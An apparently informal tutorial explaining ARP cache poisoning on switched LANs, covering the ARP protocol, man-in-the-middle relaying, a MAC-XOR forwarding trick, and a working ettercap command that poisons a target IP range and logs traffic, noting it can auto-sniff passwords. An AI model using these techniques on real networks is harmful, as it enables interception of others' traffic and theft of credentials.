Why is it necessary?
On a traditional hub, all traffic is sent to all computers. If one wants observe the traffic on the lan, one merely has to put a network card in promiscuous mode and turn on a packet sniffer. However, in a switched environment traffic is routed to a specific port on the switch. This means that traffic is a bit harder to observe. This technique will allow us to observe traffic on a lan.How Does ARP Work?
Well, let's first take a look at how normal interaction takes place on a switched network.
Imagine we have computers Host A and Host B. We also assume that these computers have never previously communicated.
Host A would like to send Host B some data. Host A looks in its ARP Cache and determines if an IP->MAC mapping exists. Since they have never communicated before, a mapping does not exist. Host A sends an ARP Request that says, "Who has the IP of Host B Tell Host A" Host B is listening and replies, "IP B is MAC of B". Host A updates it's ARP table with the IP->Mac mapping. Host A can now communicate freely with Host B having established its location on the network. Notes: ARP is a stateless protocol and there is absolutely no authentication to determine if the reply actually came from the correct host. This means we can send ARP replies whenever we want, and with the exception of a few Operating Systems, the ARP cache of the target computer will be updated. In addition, whenever we force an update it is ephemeral; we must repoison often. This leads to some interesting caveats.How Does ARP Poisoning Work?
The main idea is, we would like to observe the data going to and from other computers. Imagine we have Host A, Host B and Host M. Host M is out computer. Host M floods the router with ARP replies that say "IP B is MAC of M". and Host M floods the router with ARP replies that say "IP A is MAC of M". This updates both ARP tables to say that the attacking computer, Host M, is Host A to Host B, and Host B to Host A. So now, all traffic intended for Host B will be sent to Host M and all traffic intended for Host A will be sent to Host M. Well, this is all well and good, but right now, both computers are incorrectly sending data to our computer. If the data isn't relayed, we've effectively Denial of Serviced the communication between the two computers. We must ensure that data is forwarded to the correct MAC (meaning the original, correct MAC). There are two ways to accomplish this. 1) Store a table of all original MAC addresses, when a packet is received with a destination IP that we spoofed, we look up the correct MAC, rewrite the packet, and forward it on its way. 2) Another, more elegant solution is to make the assumption that we will only receive data from the Man in the Middle'd computers and data. This way, we can modify the example above in the following way: Host M floods the router with ARP replies that say "IP B is MAC of B XOR 0xFBEEF". and Host M floods the router with ARP replies that say "IP A is MAC of A XOR 0xFBEEF". This allows us to not use our own MAC address and create a unique MAC for spoofing. When a packet arrives that is not our own, XOR the MAC with 0xFBEEF(sign extend!), rewrite the packet's destination MAC with the XOR'd one, and forward the packet. This can be done simply by setting a PCap filter.This sounds hard. Is there an easy way to do this?
Of course! This type of tool is a necessity for the security aware computer user. The most full featured ARP Poison utility is called EtterCap. From the site: "Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. " This utility has a ton of other features and cool tricks, but the simplest command for use is: [root@noone ~]$ ettercap -T -q -M arp /target ip/ -w output.packets -T text mode -q don't print raw packet dumps -M man in the middle (use arp as opposed to icmp redirection, so we specify a type) /target ip/ of the form /1.2.3.4/ or /1.2.3.0-255/ -w output.packets write all data to a pcap file So this will log all packets to a file. In addition, we can load ethereal and watch captures in real time. If you are very lazy, you can use the automatic dissectors provided by ettercap to automagically sniff passwords and other random goodies.